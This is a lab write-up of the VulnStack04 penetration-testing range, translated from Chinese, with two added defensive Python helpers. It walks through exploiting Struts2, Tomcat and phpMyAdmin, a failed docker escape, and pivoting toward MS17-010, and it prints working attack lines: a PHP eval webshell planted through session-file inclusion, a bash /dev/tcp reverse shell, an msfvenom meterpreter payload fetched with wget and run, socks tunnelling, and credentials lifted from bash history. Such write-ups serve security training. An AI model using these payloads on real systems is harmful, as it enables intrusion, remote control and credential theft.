[Penetration Testing] VulnStack04

VulnStack04

I. Environment Setup

0x01 Network mode configuration

Environment overview:

kali  : 192.168.40.129
ubuntu: public 192.168.40.128, internal 192.168.183.128
win7  : internal 192.168.183.129
DC    : internal 192.168.183.130

Note:

The VM network must be changed beforehand so that network adapter 1 sits on the 192.168.183.0/24 segment.

0x02 Service configuration

Next, start the vulnerable services on the ubuntu machine:

cd /home/ubuntu/Desktop/vulhub/struts2/s2-045
sudo docker-compose up -d
cd /home/ubuntu/Desktop/vulhub/tomcat/CVE-2017-12615
sudo docker-compose up -d
cd /home/ubuntu/Desktop/vulhub/phpmyadmin/CVE-2018-12613
sudo docker-compose up -d

II. Penetration Testing

0x01 Information gathering

Only one IP address is known, so check which ports are open:

sudo nmap -sS -sV -Pn -T 4 192.168.40.128

Nmap scan report for 192.168.40.128
Host is up (0.000047s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
2001/tcp open http Jetty 9.2.11.v20150529
2002/tcp open http Apache Tomcat 8.5.19
2003/tcp open http Apache httpd 2.4.25 ((Debian))
MAC Address: 00:0C:29:32:AB:01 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The target machine has four open ports.

0x02 Approaches

Based on the port information, there are two approaches:

  • Brute-force SSH on port 22;
  • Visit the different web service ports and gather more information.

0x03 GetShell

First approach: brute-force SSH on port 22. If the wordlist is strong enough or the target uses a weak password, we obtain login credentials directly.

Logging in remotely with those credentials gives us a machine straight away.

Of course, in a real engagement you need to check whether it is a honeypot.

Second approach: visit the different web ports and inspect the specific services to keep collecting information.

Port 2001, Struts2 GetShell:

It is an upload page; fingerprinting it with Finger identifies Struts2 Showcase.

Scanning with a dedicated vulnerability checker shows that the target is affected by S2-045.

Trying to execute a command succeeds.

Running ifconfig to check the IP information fails with /bin/bash: ifconfig: command not found.

Next, upload a webshell to the specified directory /usr/src/src/main/webapp/temp1.jsp.

Visiting the page returns a blank page, which means the upload succeeded.

Connect with Behinder (冰蝎) to get a shell.

We have root privileges.

Pinging a DNSLog domain confirms that the target has outbound network access.

Port 2002, Tomcat GetShell:

The port serves the Tomcat default page.

The manager page returns 403.

An automated Nuclei scan reports CVE-2017-12615, the Tomcat file upload vulnerability.

Then intercept the request and write a Behinder webshell to get a shell; not repeated here.

Port 2003, phpMyAdmin GetShell:

Visiting port 2003 lands directly in the admin backend without authentication; the version is 4.8.1.

The first idea is to use the 4.8.1 file inclusion to get a shell:

http://192.168.40.128:2003/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd

SHOW VARIABLES LIKE 'general%';
SET GLOBAL general_log='on';

But the second statement cannot be executed; it reports insufficient privileges.

Switch to another method:

// The field after sess_ is the phpMyAdmin value from the Cookie: JSESSIONID=D2708E458170423AAF30900487729C84; pma_lang=zh_CN; phpMyAdmin=164066fc245614fc500901868bac04b5
select '<?php phpinfo()?>';
http://192.168.40.128:2003/index.php?target=db_sql.php%253f/../../../../../../../../tmp/sess_164066fc245614fc500901868bac04b5

// This reveals the target web root: /var/www/html/
select "<?php file_put_contents('/var/www/html/shell.php','<?php @eval($_POST[cmd]);?>')?>"
http://192.168.40.128:2003/index.php?target=db_sql.php%253f/../../../../../../../../tmp/sess_164066fc245614fc500901868bac04b5
http://192.168.40.128:2003/shell.php

Connect with AntSword (蚁剑) to get a shell.

0x04 Docker Escape

After getting the shell, since ifconfig could not be executed, run ls -alh /.dockerenv to check whether this is a docker container:

/usr/src/ >ls -alh /.dockerenv
-rwxr-xr-x 1 root root 0 Jan 22 2020 /.dockerenv

The .dockerenv file exists, so the current shell is inside a docker container and an escape is needed.

Tried the Dirty COW escape, which failed:

git clone https://github.com/scumjr/dirtycow-vdso.git
cd /dirtycow-vdso/
make

Upload the CDK tool and run cdk evaluate --full for information gathering:

[Information Gathering - System Info]
2022/04/17 11:14:03 current dir: /
2022/04/17 11:14:03 current user: root uid: 0 gid: 0 home: /root
2022/04/17 11:14:03 hostname: 174745108fcb
2022/04/17 11:14:03 debian debian 9.11 kernel: 4.4.0-142-generic

[Information Gathering - Services]
2022/04/17 11:14:03 service found in process:
1 0 java
2022/04/17 11:14:03 service found in process:
164 1 python
2022/04/17 11:14:03 service found in process:
256 254 python

[Information Gathering - Commands and Capabilities]
2022/04/17 11:14:03 available commands:
curl,wget,find,ps,java,python,apt,dpkg,ssh,git,svn,mount,fdisk,base64,python2,python2.7,perl
2022/04/17 11:14:03 Capabilities hex of Caps(CapInh|CapPrm|CapEff|CapBnd|CapAmb):
CapInh: 00000000a80425fb
CapPrm: 00000000a80425fb
CapEff: 00000000a80425fb
CapBnd: 00000000a80425fb
CapAmb: 0000000000000000
Cap decode: 0x00000000a80425fb = CAP_CHOWN,CAP_DAC_OVERRIDE,CAP_FOWNER,CAP_FSETID,CAP_KILL,CAP_SETGID,CAP_SETUID,CAP_SETPCAP,CAP_NET_BIND_SERVICE,CAP_NET_RAW,CAP_SYS_CHROOT,CAP_MKNOD,CAP_AUDIT_WRITE,CAP_SETFCAP
Add capability list:
[*] Maybe you can exploit the Capabilities below:

[Information Gathering - Mounts]

[Information Gathering - Net Namespace]
container net namespace isolated.

[Information Gathering - Sysctl Variables]
2022/04/17 11:14:03 net.ipv4.conf.all.route_localnet = 0

[Discovery - K8s API Server]
2022/04/17 11:14:03 checking if api-server allows system:anonymous request.
err found while searching local K8s apiserver addr.:
err: cannot find kubernetes api host in ENV
api-server forbids anonymous request.
response:

[Discovery - K8s Service Account]
load K8s service account token error.:
open /var/run/secrets/kubernetes.io/serviceaccount/token: no such file or directory

[Discovery - Cloud Provider Metadata API]
2022/04/17 11:14:04 failed to dial Alibaba Cloud API.
2022/04/17 11:14:04 failed to dial Azure API.
2022/04/17 11:14:04 failed to dial Google Cloud API.
2022/04/17 11:14:05 failed to dial Tencent Cloud API.
2022/04/17 11:14:05 failed to dial OpenStack API.
2022/04/17 11:14:05 failed to dial Amazon Web Services (AWS) API.
2022/04/17 11:14:06 failed to dial ucloud API.

[Information Gathering - Sensitive Files]
.dockerenv - /.dockerenv
/.bashrc - /etc/skel/.bashrc
/.bashrc - /root/.bashrc

[Information Gathering - ASLR]
2022/04/17 11:14:06 /proc/sys/kernel/randomize_va_space file content: 2
2022/04/17 11:14:06 ASLR is enabled.

[Information Gathering - Cgroups]
2022/04/17 11:14:06 /proc/1/cgroup file content:
13:name=systemd:/docker/174745108fcbb3f9cddbb9dc0f54030ccc305920928c9be0de1a04567b152773
12:pids:/docker/174745108fcbb3f9cddbb9dc0f54030ccc305920928c9be0de1a04567b152773
11:hugetlb:/docker/174745108fcbb3f9cddbb9dc0f54030ccc305920928c9be0de1a04567b152773
10:net_prio:/docker/174745108fcbb3f9cddbb9dc0f54030ccc305920928c9be0de1a04567b152773
9:perf_event:/docker/174745108fcbb3f9cddbb9dc0f54030ccc305920928c9be0de1a04567b152773
8:net_cls:/docker/174745108fcbb3f9cddbb9dc0f54030ccc305920928c9be0de1a04567b152773
7:freezer:/docker/174745108fcbb3f9cddbb9dc0f54030ccc305920928c9be0de1a04567b152773
6:devices:/docker/174745108fcbb3f9cddbb9dc0f54030ccc305920928c9be0de1a04567b152773
5:memory:/docker/174745108fcbb3f9cddbb9dc0f54030ccc305920928c9be0de1a04567b152773
4:blkio:/docker/174745108fcbb3f9cddbb9dc0f54030ccc305920928c9be0de1a04567b152773
3:cpuacct:/docker/174745108fcbb3f9cddbb9dc0f54030ccc305920928c9be0de1a04567b152773
2:cpu:/docker/174745108fcbb3f9cddbb9dc0f54030ccc305920928c9be0de1a04567b152773
1:cpuset:/docker/174745108fcbb3f9cddbb9dc0f54030ccc305920928c9be0de1a04567b152773
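The CapEff mask in that output can be decoded and checked against the capability set Docker grants an unprivileged container by default, as in the following script, an added example that is not part of the original write-up; the Docker default list is assumed from Docker's documentation, and the mask value is the one CDK printed above.

```python
# Added example (not from the write-up): decode a Linux capability bitmask such
# as the CapEff value CDK printed above and compare it with the set Docker grants
# an unprivileged container by default (assumed from Docker's documentation).
CAP_NAMES = [  # index = capability bit number, per linux/capability.h
    "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_DAC_READ_SEARCH", "CAP_FOWNER",
    "CAP_FSETID", "CAP_KILL", "CAP_SETGID", "CAP_SETUID", "CAP_SETPCAP",
    "CAP_LINUX_IMMUTABLE", "CAP_NET_BIND_SERVICE", "CAP_NET_BROADCAST",
    "CAP_NET_ADMIN", "CAP_NET_RAW", "CAP_IPC_LOCK", "CAP_IPC_OWNER",
    "CAP_SYS_MODULE", "CAP_SYS_RAWIO", "CAP_SYS_CHROOT", "CAP_SYS_PTRACE",
    "CAP_SYS_PACCT", "CAP_SYS_ADMIN", "CAP_SYS_BOOT", "CAP_SYS_NICE",
    "CAP_SYS_RESOURCE", "CAP_SYS_TIME", "CAP_SYS_TTY_CONFIG", "CAP_MKNOD",
    "CAP_LEASE", "CAP_AUDIT_WRITE", "CAP_AUDIT_CONTROL", "CAP_SETFCAP",
    "CAP_MAC_OVERRIDE", "CAP_MAC_ADMIN", "CAP_SYSLOG", "CAP_WAKE_ALARM",
    "CAP_BLOCK_SUSPEND", "CAP_AUDIT_READ", "CAP_PERFMON", "CAP_BPF",
    "CAP_CHECKPOINT_RESTORE",
]

DOCKER_DEFAULT_CAPS = {  # assumed default set for a container without --cap-add
    "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_FOWNER", "CAP_FSETID", "CAP_KILL",
    "CAP_SETGID", "CAP_SETUID", "CAP_SETPCAP", "CAP_NET_BIND_SERVICE",
    "CAP_NET_RAW", "CAP_SYS_CHROOT", "CAP_MKNOD", "CAP_AUDIT_WRITE",
    "CAP_SETFCAP",
}

def decode_caps(mask: int) -> list:
    """Names of the capabilities whose bit is set in the mask, in bit order."""
    return [CAP_NAMES[b] if b < len(CAP_NAMES) else f"CAP_{b}"
            for b in range(mask.bit_length()) if mask >> b & 1]

def extra_caps(mask: int) -> list:
    """Capabilities beyond Docker's defaults: each is a deliberate --cap-add or
    --privileged grant that widens the escape surface and should be reviewed."""
    return [c for c in decode_caps(mask) if c not in DOCKER_DEFAULT_CAPS]

def parse_status_line(line: str) -> int:
    """Parse a 'CapEff:\t00000000a80425fb' line from /proc/<pid>/status."""
    return int(line.split(":", 1)[1].strip(), 16)

if __name__ == "__main__":
    # Value taken from the CDK output in the write-up above.
    cap_eff = parse_status_line("CapEff:\t00000000a80425fb")
    print(", ".join(decode_caps(cap_eff)))
    print("beyond Docker defaults:", extra_caps(cap_eff) or "none")
```

For this container the decoded list is exactly Docker's default set, which is why CDK lists nothing under "Maybe you can exploit the Capabilities below".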

Tried cdk runc-pwn to escape via CVE-2019-5736, but it still failed with the error "cannot find RunC process inside container".

According to other people's write-ups, CVE-2019-5736 needs someone on the target host to exec into the docker container to trigger it.

Wanting to avoid interaction as much as possible, I tried several other escape methods, all of which failed; the only option left was to simulate an administrator exec-ing into the container for CVE-2019-5736:

git clone https://github.com/Frichetten/CVE-2019-5736-PoC.git
cd CVE-2019-5736-PoC
vim main.go
#!/bin/bash \n bash -i >& /dev/tcp/192.168.40.129/6666 0>&1
go build main.go

Upload the compiled main binary with Behinder, make it executable and run it.

But for some unknown reason, although the host did run exec, no reverse shell came back even though the payload was identical. Very frustrating...

Set the escape aside for now and log in to the host directly with the weak SSH password...

0x05 Lateral Movement

ifconfig shows the internal subnet 192.168.183.0/24.

Generate a shell with msf, upload it to the host and run it to get meterpreter; upload the ew tunneling tool:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.40.129 LPORT=9999 -f elf > shell.elf
python3 -m http.server 6555

// On the host, after chmod +x:
./ew_for_linux64 -s rssocks -d vps -e 8888
// On the kali attacker side:
./ew_for_linux64 -s rcsocks -l 1080 -e 8888
// Change the proxychains configuration to: socks4 127.0.0.1 1080

sudo proxychains msfconsole
use exploit/multi/handler
set lhost 192.168.40.129
set lport 9999
set payload linux/x86/meterpreter/reverse_tcp
run

// Run on the host:
wget http://192.168.40.129:6555/shell.elf
chmod 777 shell.elf
./shell.elf

Next, gather internal network information; the live hosts 192.168.183.130 and 192.168.183.131 are found:

run autoroute -s 192.168.183.0/24
use auxiliary/scanner/discovery/udp_probe
set rhosts 192.168.183.0-255
set threads 20
run

Port-scan the live hosts: both have port 445 open, one is Windows Server 2008 and the other is Windows 7, so 130 can be taken to be the domain controller and 131 a domain member:

sudo proxychains nmap -sS -sV -T 4 -p22,80,445,1433,3306 192.168.183.130 192.168.183.131

Use nmap's vulnerability scripts against port 445; both machines are reported as vulnerable to MS17-010:

sudo proxychains nmap -sS -sV -T 4 -p 445 --script=vuln 192.168.183.130 192.168.183.131

Nmap scan report for 192.168.183.130
Host is up (0.00059s latency).

PORT STATE SERVICE VERSION
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: DEMO)
Service Info: Host: WIN-ENS2VR5TR3N; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

Nmap scan report for 192.168.183.131
Host is up (0.00053s latency).

PORT STATE SERVICE VERSION
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: DEMO)
Service Info: Host: TESTWIN7-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 2 IP addresses (2 hosts up) scanned in 45.49 seconds
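As an added example, not the author's tooling, here is a small parser for that nmap --script=vuln text output that lists which hosts a given smb-vuln script reported as VULNERABLE, the kind of triage a defender does before patching; the sample input is constructed from the scan above, with the second host altered to NOT VULNERABLE so both branches are exercised.

```python
# Added example (not the write-up's own tooling): parse nmap --script=vuln text
# output like the scan above and list hosts a given smb-vuln script flagged.
import re

# Constructed sample abbreviated from the write-up's scan; second host altered.
SAMPLE = """\
Nmap scan report for 192.168.183.130
Host script results:
|_smb-vuln-ms10-054: false
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
|_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

Nmap scan report for 192.168.183.131
Host script results:
|_smb-vuln-ms10-054: false
| smb-vuln-ms17-010:
| State: NOT VULNERABLE
|_ IDs: CVE:CVE-2017-0143
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
STATE_RE = re.compile(r"^\|_?\s*State:\s*(.+)$")
SCRIPT_RE = re.compile(r"^\|_?\s?([\w-]+):\s*(.*)$")  # "| name:" or "|_name: value"

def parse_vuln_scan(text):
    """Map host -> {smb-vuln script -> state}; multi-line scripts use 'State:'."""
    results, host, script = {}, None, None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            host, script = m.group(1), None
            results[host] = {}
        elif host is None or not line.startswith("|"):
            continue  # headers, port table, blank lines
        elif (m := STATE_RE.match(line)) and script:
            results[host][script] = m.group(1).strip()
        elif (m := SCRIPT_RE.match(line)) and m.group(1).startswith("smb-vuln"):
            script = m.group(1)
            results[host][script] = m.group(2).strip() or "UNKNOWN"
    return results

def vulnerable_hosts(text, script="smb-vuln-ms17-010"):
    return [h for h, s in parse_vuln_scan(text).items() if s.get(script) == "VULNERABLE"]
```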

Alternatively, upload fscan for the internal scan.

Exploiting with the module fails; others got straight in, and it did not work through the socks proxy either. Not sure where the problem is:

use exploit/windows/smb/ms17_010_eternalblue
set rhost 192.168.183.134
set payload windows/meterpreter/bind_tcp
exploit

Running cat .bash_history | grep 192.168.183 on the ubuntu machine yields a credential: douser:Dotest123.

Tried wmiexec to get access, still failed... starting to wonder whether something is wrong with the lab environment:

./ew -s rcsocks -l 1080 -e 8888
./ew -s rssocks -d 192.168.40.130 -e 8888
proxychains python3 wmiexec.py -debug "douser@Dotest123@192.168.183.134"

I looked at many write-ups: some got straight in, and many others could not get in no matter what, like me. Neither the win7 nor the server2008 has outbound access, so this can only be counted as a failed attempt...